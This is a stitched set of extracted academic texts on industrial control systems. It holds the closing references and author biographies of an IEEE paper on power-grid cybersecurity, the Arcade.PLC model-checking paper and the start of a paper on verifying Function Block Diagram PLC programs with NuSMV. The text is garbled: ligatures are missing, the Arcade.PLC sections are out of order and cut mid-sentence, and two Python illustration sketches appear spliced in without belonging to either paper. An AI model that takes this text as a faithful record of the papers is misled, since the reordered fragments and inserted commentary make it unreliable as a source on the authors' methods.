29, no. 4, pp. 487 500, 2010. [47] S. East, J. Butts, M. Papa, and S. 
Shenoi, BA taxonomy of attacks on the DNP3 protocol, [inCritical Infrastructure Protection III , vol. 311, C. Palmer and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2009, pp. 67 81. [48] P. Koopman, BEmbedded system security, [ Computer , vol. 37, pp. 95 97, Jul. 2004. [49] M. LeMay and C. A. Gunter, BCumulative attestation kernels for embedded systems, [in Proc. 14th Eur. Conf. Res. Comput. Security . Berlin, Germany: Springer-Verlag, 2009,pp. 655 670. [50] C. Castelluccia, A. Francillon, D. Perito, and C. Soriente, BOn the difficulty of software-based attestation of embedded devices, [inProc. 16th ACM Conf. Comput. Commun. Security , 2009, pp. 400 409. [51] R. Chandia, J. Gonzalez, T. Kilpatrick, M. Papa, and S. Shenoi, BSecurity strategies for SCADA networks, [in Critical Infrastructure Protection , vol. 253, E. Goetz and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2007, pp. 117 131. [52] L. Briesemeister, S. Cheung, U. Lindqvist, and A. Valdes, BDetection, correlation, visualization of attacks against critical infrastructure systems, [inProc. 8th Annu. Int. Conf. Privacy Security Trust , Aug. 2010, pp. 15 22.[53] R. C. Parks, BSAND2007-7328: Guide to critical infrastructure protection cybervulnerability assessment, [Sandia National Laboratories, Nov. 2007. [54] M. R. Permann and K. Rohde, BCyber assessment methods for SCADA security, [ The Instrumentation, Systems andAutomation Society (ISA), Tech. Rep., 2005. [55] National SCADA Test Bed: Fact Sheet , Idaho National Laboratory (INL), 2007. [56] NSTB Assessments Summary Report: Common Industrial Control System Cyber Security Weaknesses , Idaho National Laboratory (INL), May 2010. [57] M. J. McDonald, G. N. Conrad, T. C. Service, and R. H. Cassidy, BSAND2008-5954: Cyber effects analysis using VCSE, promoting control system reliability, [Sandia National Laboratories, Sep. 2008. [58] A. Hahn, B. Kregel, M. Govindarasu, J. Fitzpatrick, R. Adnan, S. Sridhar, and M. Higdon, BDevelopment of the POWERCYBER SCADA security testbed, [in Proc. 6th Annu. Workshop Cyber Security Inf. Intell. Res. , 2010, pp. 21-1 21-4. [59] D. C. Bergman, D. Jin, D. M. Nicol, and T. Yardley, BThe virtual power system testbed and inter-testbed integration, [inProc. 2nd Workshop Cyber Security Experiment. Test , Aug. 2009, pp. 1 6. [60] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, S. K., and A. Valdes, BUsing model-based intrusion detection for SCADA networks, [in Proc. SCADA Security Sci. Symp. , Jan. 2007. [61] X. Jin, J. Bigham, J. Rodaway, D. Gamez, and C. Phillips, BAnomaly Detection in Electricity Cyber Infrastructures, [Proc. Int. Workshop CNIP 2006 , 2006. [62] R. Berthier, W. Sanders, and H. Khurana, BIntrusion detection for advanced metering infrastructures: Requirements and architectural directions, [inProc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 350 355. [63] P. Sousa, A. Bessani, M. Correia, N. Neves, and P. Verissimo, BHighly available intrusion-tolerant services with proactive-reactive recovery, [IEEE Trans. Parallel Distrib. Syst. , vol. 21, no. 4, pp. 452 465, Apr. 2010. [64] Scope of Cyber Attack Task Force (CATF) , North American Electric Reliability Corporation, 2011. ABOUT THE AUTHORS Siddharth Sridhar (Student Member, IEEE) re- ceived the B.E. degree in electrical and electronicsengineering from The College of Engineering,Guindy (Anna University), India, in 2004. He is currently working towards the Ph.D. degree in computer engineering at the Department of Elec-trical and Computer Engineering, Iowa StateUniversity, Ames. 
His research interests are in the application of intelligent cybersecurity methods to power sys-tem monitoring and control. Adam Hahn (Student Member, IEEE) received the B.S. degree in computer science from the Univer-sity of Northern Iowa, Cedar Falls, in 2003 andthe M.S. degree in computer engineering from Iowa State University (ISU), Ames, in 2006, where he is currently working towards the Ph.D. degreeat the Department of Electrical and ComputerEngineering. He is currently an Information Security Engi- neer at the MITRE Corporation and has participat-ed in Institute for Information Infrastructure Protection (I3P) projects. Hisresearch interests include cyber vulnerability assessment, critical infrastructure cybersecurity, and smart grid technologies.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 223 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Manimaran Govindarasu (Senior Member, IEEE) received the Ph.D. degree in computer science andengineering from the Indian Institute of Technol- ogy (IIT), Chennai, India, in 1998. He is currently a Professor in the Department of Electrical and Computer Engineering, Iowa State University, Ames, and he has been on the faculty there since 1999. His research expertise isin the areas of network security, real-time em-bedded systems, and cyber physical security of smart grid. He has recently developed cybersecurity testbed for smart grid at Iowa State University to conduct attack defense evaluations anddevelop robust countermeasures. He has coauthored more than 125peer-reviewed research publications.Dr. Govindarasu has given tutorials at reputed conferences (including IEEE INCOFOM 2004 and IEEE ComSoc Tutorials Now )o nt h es u b j e c to f cybersecurity. He has served in technical program committee as chair,vice-chair, and member for many IEEE conferences/workshops, and served as session chair in many conferences. He is a coauthor of the text Resource Management in Real-Time Systems and Networks (Cambridge, MA: MIT Press, 2001). He has served as guest coeditor for several journals including leading IEEE magazines. He has contributed to the U.S DoE NASPInet Specification project and i s currently serving as the chair of the Cyber Security Task Force at IEEE Power and Energy Systems Society(PES) CAMS subcommittee.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 224 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply.
Arcade.PLC_a_verification_platform_for_programmable_logic_controllers.pdf
This paper introduces Arcade.PLC , a veri cation platform for programmable logic controllers (PLCs). The tool supports static analysis as well as CTL and past-time LTL model checking using counterexample-guided abstraction re nement for di erent programming languages used in industry. In the underlying principles of the framework, knowledge about the hardware platform is exploited so as to provide e cient techniques. The e ectiveness of the approach is evaluated on programs implemented using a combination of programming languages. Categories and Subject Descriptors D.2.4 [ Software Engineering ]: Software/Program Veri - cation Formal methods, Model checking General Terms Veri cation state space, it is also valid in the concrete model; otherwise, we generate a counterexample that can potentially be spurious. This is checked by replaying the counterexample, i. e., repeating the successor-building and following the states comprising the counterexample. If, during replay, there is an ambiguous jump or atomic proposition in the trace which depends on global variables, we store the respective predicates as so-called lemmas . Then, we guard the program with all lemmas, guiding the re nement of the state space similar to control ow determinization. The idea of this approach is that the lemmas are checked at the end of a cycle, where the model checker is still aware of symbolic/relational information (which is not stored in the state space). Restarting model checking until either the formula is valid or we do not nd further lemmas thus eventually resolves over-approximate behavior that leads to spurious counterexamples. If a counterexample is legitimate, i. e., all transitions are possible without relying on further lemmas, it is presented to the user. All transitions are labeled with input values necessary for reaching the destination. Due to abstraction re- nement from above, they typically are maximal in the sense that increasing the set of possible values of a variable would make control ow ambiguous. Thus, the counterexample shows the complete set of failure inducing input. For clarity, inputs containing /latticetop(i. e., irrelevant inputs) are omitted from display. This further aids in debugging erroneous behavior by drawing attention to the relevant inputs. 2.5 Hierarchical Predicate Abstraction In addition, we have developed a predicate abstraction to further reduce the state space. To illustrate the idea, consider a state swhere x=[0,50]and the formula holds. Then, a new state s/primeidentical to sbut with, e.g., x= [7,23], is entailed bys. Thus, s/primedoes not have to be inspected. The key idea to achieve this is to organize the state space in a form that supports e cient entailment checks while still having explicit (though abstract) states. We do so by using predicates which are represented in a tree-structure. Each level in the tree partitions the state space (and so do sub-levels, but the predicates in the di erent levels di er). Entailment checking then amounts to traversing this tree. New predicates are automatically derived from atomic proposition taken from the formula and by analyzing lemmas necessary for counterexamples. In principle the overall idea follows the spirit of OBDD-based approaches, with the exception that we use the leaves of our structure to store the transition relation. As of now, the predicate abstraction is only implemented for checking invariants. 
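To make the entailment idea above concrete, here is a small, hedged sketch in plain Python over interval-valued abstract states. It reproduces only the containment check that motivates the tree-organized state space; it is not the tool's actual data structures, and the variable names are invented.

```python
Interval = tuple          # (low, high), inclusive bounds
AbstractState = dict      # variable name -> Interval

def entails(old: AbstractState, new: AbstractState) -> bool:
    """True if every variable's interval in `new` lies inside its interval in `old`.

    If so, `new` adds no behavior beyond `old` and need not be explored again.
    """
    return all(
        var in old and old[var][0] <= lo and hi <= old[var][1]
        for var, (lo, hi) in new.items()
    )

s      = {"x": (0, 50), "mode": (1, 1)}
s_new  = {"x": (7, 23), "mode": (1, 1)}
s_wide = {"x": (7, 60), "mode": (1, 1)}
print(entails(s, s_new))    # True: already covered, skip it
print(entails(s, s_wide))   # False: must be explored
```

Organizing the predicates in a tree, as the text describes, simply lets this containment test be answered without comparing against every stored state.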
2.6 Static Analysis Finally, Arcade.PLC features a static analysis framework, which also operates on our IR and uses the abstract inter- pretation to: (a) infer range and value-set information about the program variables, (b) perform liveness analysis and (c) perform slicing depending on the formula to be checked. For (a), we use basically the same algorithm for the successorgeneration as the model checker, but rely on the value-set domain to capture more precise information. Instead of build- ing the reachable state space, however, we join the abstract values of all variables for each possible successors state after simulating a cycle. This ensures quick convergence, while still generating valuable range information. 3. EXPERIMENTS This section presents an evaluation of Arcade.PLC on programs of varying complexity written in di erent languages. All experiments where performed on a desktop computer equipped with an Intel Core i5 processor and 16 GiB RAM. Arcade.PLC itself has been implemented in Java . 3.1 Benchmarks The rst collection of ve programs consists of safety- critical FBs de ned by the PLCopen consortium [11] and constitute up to 14 inputs of type Boolean and Integer. They are speci ed in terms of automata, timing diagrams and semi-formal descriptions, while the implementation of the FBs itself is left to the developer. All FBs, irrespective of their implementation language, use the standard library in ST. The speci cations that we checked formalize correctness requirements from the speci cations. The second case study examines programs for controlling conveyor belts using a Siemens SIMATIC S7 PLC. The conveyor belts all operate independently and are controlled with a merely Boolean program using light curtains. In the third case study, we veri ed a controller for a 3D robot, also using a SIMATIC S7. This robot has 3 motors that allow to move its arm in all dimensions, and one motor for its mechanical grab. All motor axes are connected to step counters, which allow the program to count the number of rotations of the respective motors. Since unlimited forth/back and up/down movement is mechanically impossible (and would ultimately destroy the motor), we veri ed that the counters remain within range. This case study was performed with increasing complexity by raising the number on controlled axes. In one case, we altered the formula slightly to provoke a counterexample. 3.2 Evaluation The experimental results using both techniques discussed in this paper are given in Tab. 1. We chose a time-out of 10 minutes for all programs (indicated by ). The table presents the number of states and runtime using both the CE- GAR and the predicate abstraction (PA) approach (checking ptLTL formulae using predicate abstraction is not possible yet, hence the n/ain row 4). Small function blocks as they are used for safety-critical functions are checked with Arcade.PLC in minutes or even seconds. When combining them to larger programs, the time for model checking increases but it is possible to check all programs in reasonable time. It is interesting to observe that CEGAR and hierarchical predicate abstraction can be seen as orthogonal techniques. In any except one case, hierarchical predicate abstraction leads to more compact state spaces using the tree-like state space representation. Depending on the structure of the program, the runtime may increase (cp. 
Robot), but in other cases it improves performance by a factor of at least 30.

Table 1: Evaluation with Arcade.PLC ("-" denotes a time-out, n/a means not supported)

Group    Program           Lang.   #loc  Spec.   Result  CEGAR #states / time   PA #states / time
PLCopen  SF_Antivalent     ST       108  CTL     true        45 / <1s               5 / <1s
         SF_EmergencyStop  IL&ST    226  CTL     CE          12 / <1s              46 / <1s
         SF_ModeSelector   ST       188  CTL     true       743 / 15s              17 / <1s
         SF_ModeSelector   ST       188  ptLTL   true       710 / 14s             n/a
         SF_ModeSelector   IL&ST    424  CTL     true         -                    45 / 50s
         SF_GuardLocking   IL&ST    400  CTL     true    39,265 / 45s               3 / <1s
         SF_MutingSeq      IL&ST    827  CTL     true         -                     3 / 151s
Belt     1 Belt            S7        92  CTL     true       128 / 1s                3 / <1s
         4 Belts           S7       323  CTL     true       137 / 7s                3 / <1s
Robot    1 Axis            S7        66  CTL     true       178 / <1s              85 / 23s
         4 Axes            S7       102  CTL     true       314 / 4s               85 / 157s
         4 Axes            S7       102  CTL     CE         178 / <1s              86 / 132s

4. CONCLUSION

In Arcade.PLC, we have implemented different, seemingly orthogonal approaches. On the one hand, we account for the specific hardware platform and its cyclic scanning mode. On the other hand, we made our framework independent of implementation languages by translating them into an IR. Our work thus dovetails with recent work that uses IRs for binaries [1, 3], which aims at providing a generic interface for low-level analyses. Indeed, Arcade.PLC is the first verification tool for PLCs that can handle modules written in different languages. Using domain-specific variants of CEGAR and predicate abstraction, it can verify programs that involve complex control flow and heavy interaction with the environment.

5. ACKNOWLEDGMENTS

Sebastian Biallas is supported by the DFG. Further, this work is supported by the DFG Research Training Group 1298 Algorithmic Synthesis of Reactive and Discrete-Continuous Systems (AlgoSyn) and by the DFG Cluster of Excellence on Ultra-high Speed Information and Communication (UMIC), German Research Foundation grant DFG EXC 89.

6. REFERENCES
[1] S. Bardin, P. Herrmann, J. Leroux, O. Ly, R. Tabary, and A. Vincent. The BINCOA Framework for Binary Code Analysis. In CAV, pages 165-170, 2011.
[2] S. Biallas, J. Brauer, and S. Kowalewski. Counterexample-Guided Abstraction Refinement for PLCs. In SSV, pages 1-9. USENIX, 2010.
[3] D. Brumley, I. Jager, T. Avgerinos, and E. J. Schwartz. BAP: A Binary Analysis Platform. In CAV, volume 6806 of LNCS, pages 463-469. Springer, 2011.
[4] G. Canet, S. Couffin, J.-J. Lesage, A. Petit, and P. Schnoebelen. Towards the automatic verification of PLC programs written in instruction list. In 2000 IEEE International Conference on Systems, Man, and Cybernetics, Nashville, volume 4, pages 2449-2454. IEEE Computer Society Press, 2000.
[5] V. Gourcuff, O. De Smet, and J.-M. Faure. Efficient representation for formal verification of PLC programs. In 8th International Workshop on Discrete Event Systems, pages 182-187, 2006.
[6] V. Gourcuff, O. De Smet, and J.-M. Faure. Improving large-sized PLC programs verification using abstractions. In Proceedings of the 17th IFAC World Congress, pages 5101-5106, 2008.
[7] International Electrotechnical Commission. IEC 61131-3: Programmable Controllers - Part 3: Programming Languages. International Electrotechnical Commission, Geneva, Switzerland, 1993.
[8] International Electrotechnical Commission. IEC 61508: Functional Safety of Electrical, Electronic and Programmable Electronic Safety-Related Systems. International Electrotechnical Commission, Geneva, Switzerland, 1998.
[9] I. Moon. Modeling programmable logic controllers for logic verification.
IEEE Control Systems Magazine , 14(2):53 59, 1994. [10] O. Pavlovic, R. Pinger, and M. Kollmann. Automated formal veri cation of PLC programms written in IL. In VERIFY , number 259 in Workshop Proce., pages 152 163. CEUR-WS.org, 2007. [11]PLCopen TC5. Safety Software Technical Speci cation, Version 1.0, Part 1: Concepts and Function Blocks . PLCopen, Germany, 2006. [12] M. Rausch and B. Krogh. Formal veri cation of PLC programs. In In Proc. American Control Conference , pages 234 238, 1998. [13]B. Schlich and S. Kowalewski. Model checking C source code for embedded systems. International Journal on Software Tools for Technology Transfer (STTT) , 11(3):187 202, 2009.341 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply.
Arcade.PLC: A Veri cation Platform for Programmable Logic Controllers Sebastian Biallas Embedded Software Laboratory RWTH Aachen University Aachen, Germany [email protected] aachen.deJ rg Brauer Veri ed Systems International GmbH Bremen, Germany brauer@veri ed.deStefan Kowalewski Embedded Software Laboratory RWTH Aachen University Aachen, Germany [email protected] aachen.de Keywords PLC, static analysis, model checking 1. INTRODUCTION PLCs [7] are control devices mostly used in the automa- tion industry to operate and monitor systems such as power plants and oil rigs. Since failures in such systems may have hazardous e ects on humans or the environment, the ap- plication of formal methods to ensure correctness is highly recommended [8]. Yet, their application remains di cult as ve di erent programming languages have been standard- ized, which can be combined in programs. A PLC typically operates in the cyclic scanning mode , which consists of three phases, each of which is executed atomically: (1) sensing inputs, (2) executing the program, and (3) writing outputs. These particularities necessitate techniques tailored to PLCs. Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for pro t or commercial advantage and that copies bear this notice and the full citation on the rst page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior speci c permission and/or a fee. ASE 12, September 3 7, 2012, Essen, Germany Copyright 12 ACM 978-1-4503-1204-2/12/09 ...$15.00.1.1 Arcade.PLC This paper presents the Arcade.PLC1model checker for PLCs, which supports speci cations in CTL and past- time LTL(ptLTL ). In principle, Arcade.PLC implements the counterexample-guided abstraction re nement (CEGAR) scheme. Yet, we have developed di erent adaptations to account for the hardware platform. To break the depen- dencies between the di erent implementation languages, we rst translate the programs, which consist of a collection of modules, into an intermediate representation (IR). The tool then accounts for the cyclic scanning mode by hiding intermediate states that appear within a cycle, and are thus invisible to the environment. The end-user can specify ob- servable input-output relations, which dovetails with typical speci cations for PLCs. To summarize, Arcade.PLC o ers the following advantages compared to other model checkers: PLC programs are supported natively, i. e., neither manual program transformation nor preprocessing is necessary. It is possible to verify programs composed of modules written in di erent languages, which is typical for real- world PLC implementations. The cyclic operation mode and the atomicity of the phases are exploited by using a symbolic and a non- symbolic abstraction step. 1.2 Related Work The rst work for the formal veri cation of PLC programs goes back to Moon [9], who translated PLC programs written inladder diagram into the input language of the model checker Svm. Similar in spirit are the works of Rausch et al. [12], Canet et al. [4] and Pavlovic et al. [10]. Later, Gourcu et al. explored the veri cation of structured text [5] and abstractions [6]. These approaches have in common that they required a transformation are limited to a subset of languages or language constructs. 
To the best of our knowledge, Arcade.PLC is the rst tool to combine fully automatic veri cation, e cient abstraction techniques, support for di erent PLC programming languages and a graphical user interface. It emerged from [mc]square [13], a model checker for microcontroller software. 1Aachen Rigorous Code Analysis and Debugging Environ- ment for PLCs http://arcade.embedded.rwth-aachen.dePermission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for pro t or commercial advantage and that copies bear this notice and the full citation on the rst page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior speci c permission and/or a fee. ASE 12, September 3 7, 2012, Essen, Germany Copyright 2012 ACM 978-1-4503-1204-2/12/09 ...$15.00 338 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply. ProgramProgram Speci cation Parser CompilerAbstract SimulationModel Checker StatespaceCounter- example AnalyzerCounter- example Arcade.PLCre ne Figure 1: Model checking process with Arcade.PLC 2. OVERVIEW AND IMPLEMENTATION PLC Programs are composed of modules called program organization units [7] (POU). A function block (FB) is a POU with a xed interface, which comprises variables used for input and for output and an implementation that is exe- cuted upon a call. Variables can retain their value for the next execution to maintain an internal state between calls (henceforth called global variables ). The actual implementa- tion can be provided in di erent languages. These languages include graphical representations resembling electric circuits, automaton representations similar to Petri nets, assembler dialects and high-level imperative languages [7, Part 3]. Some vendors use proprietary languages or extensions. The other types of POUs are functions , which are FBs equipped with an explicit return value but no internal state, and programs , which are FBs to be used as the main program. 2.1 Features Arcade.PLC can verify all kinds of POUs, i. e., either entire programs or just parts of it can be selected for anal- ysis. Its overall structure is shown in Fig. 1. The user can supply a program as (one or many) text les containing dif- ferent POUs. For now, we support programs written in the standardized languages structured text (ST) and instruction list(IL) and the proprietary statement list (STL) used by Siemens SIMATIC S7. Programs can use an implementation of standard library FBs (counters, edge detection, timers, etc.) written in ST. To handle FBs in di erent languages uni- formly, and also to simplify abstract simulation, the programs are rst compiled into an IR. This also ensures that our ab- stract simulator operates on a well-de ned semantics without having to struggle with semantic nuances such as unde ned or implementation-dependent behavior and vendor-speci c extensions, which are thus hidden in the front-end. For veri cation, the user can specify formulae in CTL and ptLTL . In these formulae, it is possible to express propositions about the values of all non-temporary program variables, which are then evaluated at the end of each execution of a cycle. 2.2 State Space Model checking is performed using an on-the- y algorithm, which starts with a coarse abstraction that is successively re ned [2]. 
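Before the formal state-space definitions that follow, a toy sketch may help illustrate the cycle-granularity view: states are observed only at cycle boundaries, and one transition corresponds to a full scan cycle. The two-input latch program, the invariant, and all names below are invented for illustration and are not Arcade.PLC interfaces; the sketch also enumerates concrete Boolean inputs instead of abstract values.

```python
from itertools import product

def freeze(d):
    """Make a dict hashable so it can be stored in a set of visited states."""
    return tuple(sorted(d.items()))

def scan_cycle(state, inputs):
    """One PLC cycle of a toy start/stop motor latch: returns (new_state, outputs)."""
    start, stop = inputs
    running = (state["running"] or start) and not stop   # classic start/stop latch
    return {"running": running}, {"motor": running}

def reachable_cycle_states(initial_state):
    """Explore states observable at cycle boundaries only (intermediate steps stay hidden)."""
    seen, frontier, transitions = set(), [freeze(initial_state)], []
    while frontier:
        state = frontier.pop()
        if state in seen:
            continue
        seen.add(state)
        for inputs in product([False, True], repeat=2):   # all input valuations
            new_state, outputs = scan_cycle(dict(state), inputs)
            transitions.append((state, inputs, freeze(new_state), tuple(outputs.items())))
            frontier.append(freeze(new_state))
    return seen, transitions

states, transitions = reachable_cycle_states({"running": False})
# Invariant checked at the end of every cycle: the stop input always overrides start.
violations = [t for t in transitions if t[1][1] and dict(t[3])["motor"]]
print(len(states), "cycle states,", len(violations), "violations of 'stop overrides start'")
```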
Let V_I, V_O and V_G denote the sets of input, output and global variables, respectively. Our formal model comprises explicit states of the form ⟨I, G, O⟩, where I, G, O are assignments of all variables in V_I, V_G, V_O to a value in their domain. A transition between states ⟨I1, G1, O1⟩ and ⟨I2, G2, O2⟩ is assumed if the program outputs O2 with internal state G2 after executing one cycle on the internal state G1 with inputs I2. Boolean and integer variables are allowed to contain abstract values, taken from the reduced product of the interval and bit-set domains (each bit can either be {0}, {1} or {0,1}). By starting with the initial state and iteratively creating successors using abstract simulation until a fixed point is reached, we obtain the reachable state space for model checking. Observe that we do not need to store inputs I that are not referred to in the formula in the state space, thereby giving a more space-efficient representation.

2.3 Control Flow Determinization

To find a suitable abstraction, we first determinize the control flow. This is done incrementally by refining the abstraction of each variable until they dictate a single trace through the program. To do so, we first guard all conditional jumps with predicates. Then, for each unvisited state s = ⟨I, G, O⟩, we simulate it with unknown inputs, i.e., s′ = ⟨I⊤, G, O⟩ where I⊤ = {v ↦ ⊤ | v ∈ V_I}. We simulate the program until either the cycle terminates, which amounts to finding a successor, or until an abstract value is ambiguous w.r.t. one of the jump predicates. In the latter case, we use predicate transformer semantics to find the weakest precondition that makes the jump predicate unambiguous. This backward transformation is based on symbolic expressions which we generate for each operation in the trace. The result gives rise to a predicate on an input or global variable which is refined so that abstract simulation on the refined values satisfies the jump predicate. Two specifics help make this efficiently possible: (a) we are always dealing with a single path through the program, and (b) PLC programs have to obey the cycle frequency, i.e., they have to produce a result before the start of the next cycle and thus consist of a small number of operations per cycle. Likewise, refinement is applied if the result at the end of a cycle is ambiguous w.r.t. atomic propositions of the specification.

Example 1. Consider a conditional jump that branches iff a > 100, where a is a register that contains the interval [30,140] and the symbolic constraint a = (i + 20) for some input i. Then, wp(a = i + 20, a > 100) = (i > 80), which entails that assigning [10,79] and [80,120] to i determinizes the control flow. We thus discard the result of the previous simulation and restart the cycle with inputs [10,79] and [80,120] for i.

2.4 CEGAR with Global Variables

We do not store symbolic expressions in the state space; e.g., for global variables x, y we do not know whether x < y if their intervals overlap. Thus, refining a global variable may introduce additional behavior, i.e., transitions infeasible in the concrete model. To cope with this, we use a CEGAR approach: If a universally quantified formula is valid in the
Model_Checking_PLC_Software_Written_in_Function_Block_Diagram.pdf
The development of Programmable Logic Controllers (PLCs) in the last years has made it possible to apply them to ever more complex tasks. Many systems based on these controllers are safety-critical, the certification of which entails a great effort. Therefore, there is a big demand for tools for analyzing and verifying PLC applications. Among the PLC-specific languages proposed in the standard IEC 61131-3, FBD (Function Block Diagram) is a graphical one widely used in rail automation. In this paper, a process of verifying FBDs with the NuSMV model checker is described. It consists of three transformation steps: FBD → textFBD → tFBD → NuSMV. The novel step introduced here is the second one: it reduces the state space dramatically, so that realistic application components can be verified. The process has been developed and tested in the area of rail automation, in particular interlocking systems. As a part of the interlocking software, a typical point logic has been used as a test case.
Model Checking PLC Software Written in Function Block Diagram
Olivera Pavlović (Siemens Mobility Division, Braunschweig, Germany, Email: [email protected]) and Ehrich (Technische Universität Braunschweig, Braunschweig, Germany, Email: [email protected])

Keywords - formal verification; model checking; PLC; FBD; IEC 61131-3

I. INTRODUCTION
Programmable Logic Controllers (PLCs) are a special type of computer used in automation systems [1]. Generally speaking, they are based on sensors and actuators which have the ability to control, monitor and interact with a particular process or a collection of processes. These processes are diverse and can be found, for example, in household appliances, emergency shutdown systems for nuclear power stations, chemical process control and rail automation systems.
IEC is an organization that provides international standards for electrical, electronic and related technologies. The standard IEC 61131-3 [2] describes, inter alia, PLC programming languages. There are five PLC languages proposed in the standard. Two of them are textual languages: (a) IL - Instruction List, and (b) ST - Structured Text. The other three are graphical languages: (c) FBD - Function Block Diagram, (d) LD - Ladder Diagram and (e) SFC - Sequential Function Chart.
In this paper, the application and verification of PLCs in the rail automation domain is considered. One area of applying PLCs in this domain is electronic interlocking systems based on PLCs. Generally, electronic interlockings are used to control signals, points, line crossovers and level crossings, thereby ensuring safe operation. Most of the interlocking software has been written in the graphical language FBD. The goal of our work is to investigate the verification of FBDs.
In the past years, there has been an increasing interest in analyzing PLC applications with formal methods. The low-level language IL has been the most investigated language in terms of PLC verification. Hence, first attempts to verify FBDs were made by verifying the IL representation of an FBD program. Let us briefly describe some of the approaches for IL verification. In [3], timed automata are used to model IL programs. For verification, the model checker UPPAAL is used. Function and function block calls are not implemented. [4] proposes Petri nets and SMV for model checking IL programs. As data structures, anything can be used that can be coded with 8 bits. Another method that proposes verification with SMV is sketched in [5]. Time and timers are not part of the model in this work. Comparing the existing IL verification techniques and analyzing the properties of the software to be verified, we took the latter method as a starting point. The theory behind our improvement of the technique was described in [6]. The tool that automates the process was published in [7]. This way, we managed to make the model checking of the IL format of the interlocking software fully automatic. The goal of [6] and [7] was to apply another method to the interlocking software described in this work. Unfortunately, the models became so complex that just small parts of the software could be verified. In the second phase of the project, in order to verify existing industrial software and not just parts of it, the verification of FBD programs has been suggested. The main idea of the technique can be found in [8]. In this paper, we formalize and automate this method.
In the last years, other work on FBD veri cation has been published ([9] and [10]). These papers do not offer enough detail to enable comparison with our work. The paper is organized as follows. Section 2 brie y reviews the PLC structure and PLC programming languages. The theoretical background of the method for FBD veri ca- tion is described in Section 3. There we introduce the textual representation of FBD. Section 4 contains a case study which 2010 Third International Conference on Software Testing, Verification and Validation 978-0-7695-3990-4/10 $26.00 2010 IEEE DOI 10.1109/ICST.2010.10439 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. Input moduleOutput moduleCPUFigure 1. PLC organization illustrates the application area for the work presented here. The automation of the veri cation method is described in Section 5. Finally, the last section draws conclusions and indicates plans for future work. II. P ROGRAMMABLE LOGIC CONTROLLERS As already mentioned, PLCs are a special type of com- puter based on sensors and actuators able to control, monitor and in uence a particular process. In this section, the PLC structure and programming languages are described. A. PLC Structure A typical PLC organization is represented in Fig. 1. Input and output modules are used to transmit data between PLC and connected peripherals. The CPU is a part of a programmable controller responsible for reading inputs, executing the control program, and updating outputs. The focus of a PLC is to repeat periodically the execution of a control program. There are three main phases of this cyclic behavior of a PLC: read data from inputs (sensors), execute the control program, and write data to outputs (actuators). B. PLC Programming languages The program organization units proposed in IEC 61131-3 can be delivered by the manufacturer or programmed by the user according to the rules de ned in this standard. In this work, the software Step7 is used. This is the current software version for programming the PLC family SIMATIC S7 of the manufacturer Siemens AG [11]. The FBD programming language [12] is a restricted graphical representation of the machine-orientated language IL. This means that not all IL programs can be represented in FBD, but on the other hand each FBD program can be mapped to IL. FBD programs are similar to circuit diagrams in electrical engineering and consist of simple elements. For example, in Fig. 3 the following elements can be found. CMP ==I(comparison of two integers), &(conjunction of two Booleans), >=1(disjunction of two Booleans), and = (assignment of a value to a variable). III. T HEORETICAL BACKGROUND With processors getting more and more powerful, and memories growing bigger and bigger, veri cation becomes feasible for more and more complex programs. The veri - cation methods at hand, in particular model checking, turn out to work quite well for our application area. As a tool, we use NuSMV (a New Symbolic Model Veri er). NuSMVwas developed by IRST (Instituto per la Ricerca Scienti ca e Tecnologica) and CMU (Carnegie Mellon University) [13]. It is a reimplementation and extension of SMV , the rst model checker based on BDD. There is no standardized process yet to verify PLC. In this section, we present a veri cation process for PLC software written in FBD. There are essentially three steps: A. 
in order to make FBD programs processable by NuSMV , graphical FBD programs are translated into textual textFBD programs; B. connections between two graphical FBD elements are represented in the textFBD le by a special type of variables - circuit variables . In order to avoid circuit variables in the NuSMV state space, textFBD programs are translated into tFBD programs; C. a tFBD program can then be easily represented by a NuSMV program. In Fig. 3, the process is shown by means of an example which we will also use later on. A. From FBD to textFBD We present the FBD components and their corresponding textFBD statements along with their informal semantics. Then we indicate their formal operational semantics and mention how isomorphism of FBD and textFBD semantics can be proved, referring to [14] for the details. 1) FBD and textFBD syntax: In the textFBD format of an FBD program, each graphical FBD operator is given a textual representation. We give an overview of the FBD elements and their representations in textFBD. Bit operations Logical AND, OR andExclusive-OR operations are represented in textFBD by Out= (In1In2)where= & orjorXOR The AND and ORoperations may have more than two inputs, giving rise to corresponding textFBD constructs like Out= ((In1&In2) &:::&In n) The instruction negate binary input negates the input of an FBD operator In This is represented in textFBD by !In. The FBD assignment = InOperand is simply represented by operand =In. Among the bit operations, there are also reset output (R) andset output (S). S InOperand R InOperand 440 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:14 UTC from IEEE Xplore. Restrictions apply. FBD ILprogram ( format) Modelising NuSMV model Model Checking satisfiednot satisfied + counterexampleCreate formattextFBD textFBD format Create model NuSMVList of Op. with local variables Substitution tFBD formatVariable descriptionCTL specificationTable of testcasesInterface description FormalisationFigure 2. Model checking FBD programs If the input value of the Roperator is true, then the operand is set to false . If the input value is false, then the operand is unchanged. As for the operator S, the operand is set only if its input value is true. A more precise semantics of the operators is given in [14]. Here we focus on their syntax. The operators are represented in textFBD by R(Operand;In);S(Operand;In) By means of the Noperator negative edge detection 1 !0, the signal state at the input is compared with that in the operand ( the edge memory bit ). If the input is false and the operand has stored true in the previous cycle, then a negative edge is recognized. In this case, the output is set 